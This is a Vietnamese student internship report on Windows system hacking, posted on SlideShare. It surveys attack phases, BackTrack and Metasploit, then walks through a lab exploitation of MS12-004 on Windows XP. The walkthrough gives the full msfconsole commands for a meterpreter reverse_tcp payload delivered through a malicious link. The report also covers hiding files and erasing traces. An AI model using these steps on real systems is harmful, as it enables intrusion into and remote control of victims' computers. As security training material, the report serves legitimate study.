SlideShare a Scribd company logo
MỞ ĐẦU
Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có
2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có
khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu
phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ
ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật)
và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan
đơn vị nghiên cứu, các doanh nghiệp… Theo nhìn nhận của Bkav, đã có những chiến
dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn
công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục
lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an
toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức,
tinh vi hơn về công nghệ.
Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ
đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ
tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở
nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng
dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an
ninh.
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để
tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành
phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử
dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật
trong thời đại Internet ngày nay.
Dương Đình Tú.
LỜI CẢM ƠN
Để thực hiện và hoàn thành đề tài này, trước hết tôi xin cảm ơn đến các thầy,
giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạng và an ninh
mạng quốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua.
Tôi cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và
tạo điều kiện cho tôi hoàn thành đề tài này.
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô
tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rút kinh nghiệm trong các
công trình tìm hiểu, phát triển sau này.
Dương Đình Tú.
PHẦN 1: GIỚI THIỆU
1.1 System Hacking và Tình hình an ninh mạng Việt Nam
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành
Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log
file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên
máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức.
1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã.
Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa
những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker
sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để
khởi động chương trình của họ một cách tự động trên máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,
các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước.
Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình
đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống.
Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và
việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ
điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng
phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft.
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy
cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại
được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang
ngày càng phổ biến nhanh chóng.
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH
Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework.
1.3 Quá trình tấn công vào một hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía
trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể
được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
• Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống.
Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính
xác hơn.
• Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta
bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu
phải đạt tới là quyền truy cập vào hệ thống.
• Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh
thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.
• Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước
malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
• Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải
được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
• Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên
quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như
Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho
mục đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn
công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được
trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy
chương trình trojan, keylogger…
PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG
MẠNG LAN
2.1 Hệ điều hành Backtrack 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux
về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của
nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau.
Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)).
Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack có trên 300 công
cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm
thử bảo mật rất nổi tiếng là Whax và Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm
thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được
phân loại như sau:
• Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có
được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang
web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có
sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
• Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các
host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng
làm portscanning.
• Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công
cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các
công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple
Network Management Protocol (SNMP).
• Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
• Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
• Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
• Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc
quyền của chúng ta cho các đặc quyền cao nhất.
• Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì
quyền truy cập.
• Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
• Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong
thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi
động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao
đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
• Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối
chương trình một hoặc tháo rời một tập tin thực thi.
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
2.2 Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện
tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và
khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể
chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể download
chương trình tại www.metasploit.com.
Metasploit hỗ trợ nhiều giao diện với người dùng:
• Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng
lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
• Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web.
• Command line interface: dùng msfcli.
Metasploit Enviroment:
Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những
options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits.
Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,
enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng
đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông
qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi
user interface được thực hiện.
Sử dụng Metasploit Framework:
a) Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có
hỗ trợ để khai thác
• Show exploits: xem các module exploit mà framework có hỗ trợ.
• Use exploit_name: chọn module exploit.
• Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/.
b) Cấu hình Module exploit đã chọn:
• show options: Xác định những options nào cần cấu hình.
• set : cấu hình cho những option của module đó.
Một vài module còn có những advanced options, chúng ta có thể xem bằng cách
gõ dòng lệnh show advanceds.
c) Verify những options vừa cấu hình:
• check: kiểm tra xem những option đã được set chính xác chưa.
d) Lựa chọn target:
• show targets: những target được cung cấp bởi module đó.
• set: xác định target nào.
e) Lựa chọn payload:
• show payloads: liệt kê ra những payload của module exploit hiện tại.
• info payload_name: xem thông tin chi tiết về payload đó.
• set payload payload_name: xác định payload module name. Sau khi lựa chọn
payload nào, dùng lệnh show options để xem những options của payload đó.
• show advanced: xem những advanced options của payload đó.
g) Thực thi exploit:
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng
ta những thông tin về hệ thống được khai thác.
2.3 Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng
cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính
trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy
in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử
dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có
trong mạng.
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng
và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt
sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các
dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các
phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa nào đang sử
dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói
nhị phân chính thức có sẵn cho Linux, Windows, và Mac OS X.
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét
lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập
vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ
http://www.nessus.org/.
Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống,
Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu
trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor, …
2.4 Xâm nhập và khai thác Windows XP
Lỗ hổng sử dụng: Ms12_004
• Khởi động msfconsole tử cửa sổ terminal của BackTrack.
• Khai báo lỗ hổng sử dụng và thiết đặt options:
• search ms12_004
• use exploit/windows/browser/ms12_004_midi
• show options
• set SRVHOST 192.168.142.128
• set PAYLOAD windows/meterpreter/reverse_tcp
• set LHOST 192.168.142.128
• exploit
BackTrack sẽ tạo ra một link chứa mã độc (http ://192.168.142.128:4444). Chỉ cần
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn
nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
Tiến hành khai thác máy nạn nhân có IP: 192.168.142.129 port 1051.
• sessions
• sessions –i 1
• getuid
• sysinfo
Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2
Nạn nhân :
• Computer: YANLOVE – 2BFCA08.
• Os: Windows XP (Build 2600. Service Pack 2).
• Architecture: x86.
• Systemlanguage: en_US.
• Meterpreter: x86/win32

More Related Content

What's hot

Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
Anhh Hữu
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
MasterCode.vn
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
Long Vũ
 
zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)
Luân Nguyễn Văn
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPT
MasterCode.vn
 
Kali linux
Kali linuxKali linux
Kali linux
Tân Trần
 
Rà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal SuiteRà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal Suite
Phạm Trung Đức
 
Windows Malware Forensic - rà soát gỡ bỏ mã độc
Windows Malware Forensic - rà soát gỡ bỏ mã độcWindows Malware Forensic - rà soát gỡ bỏ mã độc
Windows Malware Forensic - rà soát gỡ bỏ mã độc
Phạm Trung Đức
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
Phong Hoang
 
ictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdfictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdf
ssuser2b6b97
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
Daewoo Han
 
đồ áN thực tập tại athena
đồ áN thực tập tại athenađồ áN thực tập tại athena
đồ áN thực tập tại athenaHuy Bach
 
tai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attttai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attt
Nguyen Xuan Quang
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
Huy Bach
 

What's hot (18)

Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
 
Luan van
Luan vanLuan van
Luan van
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
 
zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)zombie-botnet (dongcatchay)
zombie-botnet (dongcatchay)
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPT
 
Kali linux
Kali linuxKali linux
Kali linux
 
Rà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal SuiteRà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal Suite
 
Windows Malware Forensic - rà soát gỡ bỏ mã độc
Windows Malware Forensic - rà soát gỡ bỏ mã độcWindows Malware Forensic - rà soát gỡ bỏ mã độc
Windows Malware Forensic - rà soát gỡ bỏ mã độc
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
ictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdfictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdf
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
đồ áN thực tập tại athena
đồ áN thực tập tại athenađồ áN thực tập tại athena
đồ áN thực tập tại athena
 
tai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attttai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attt
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
 

Viewers also liked

Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạngDanh Tran
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
Huynh Khang
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Con Ranh
 
Android Hacking
Android HackingAndroid Hacking
Android Hacking
antitree
 
CEH - Module 5 : System Hacking
CEH - Module 5 : System HackingCEH - Module 5 : System Hacking
CEH - Module 5 : System Hacking
Avirot Mitamura
 
Mobile Hacking
Mobile HackingMobile Hacking
Mobile Hacking
Novizul Evendi
 
Mobile cloning
Mobile cloningMobile cloning
Mobile cloning
Abhishek Abhi
 
Air car ppt
Air car pptAir car ppt
Air car ppt
Rohit Nair
 

Viewers also liked (10)

Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạngBáo cáo cuối kỳ athena  backtrack và các công cụ kiểm tra an ninh mạng
Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
 
Android Hacking
Android HackingAndroid Hacking
Android Hacking
 
CEH - Module 5 : System Hacking
CEH - Module 5 : System HackingCEH - Module 5 : System Hacking
CEH - Module 5 : System Hacking
 
Mobile Hacking
Mobile HackingMobile Hacking
Mobile Hacking
 
Mobile cloning
Mobile cloningMobile cloning
Mobile cloning
 
AIR POWERED ENGINE PPT
AIR POWERED ENGINE PPTAIR POWERED ENGINE PPT
AIR POWERED ENGINE PPT
 
Air car ppt
Air car pptAir car ppt
Air car ppt
 

Similar to SYSTEM HACKING - TUẦN 2

Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athena
Quý Đồng Nast
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Loc Tran
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdf
PeterTh3
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
hanhha12
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
nataliej4
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomware
thanglx
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
Long Prồ
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
Đàm Văn Sáng
 
Virus full
Virus fullVirus full
Virus full
Củ Chuối
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Thịt Xốt Cà Chua
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
NuioKila
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
hoaihuysc
 
Bai 8
Bai 8Bai 8
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Liên Hán
 
Mạng máy tính nâng cao
Mạng máy tính nâng caoMạng máy tính nâng cao
Mạng máy tính nâng cao
ssuserd16c49
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Liên Hán
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
MasterCode.vn
 

Similar to SYSTEM HACKING - TUẦN 2 (20)

Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athena
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdf
 
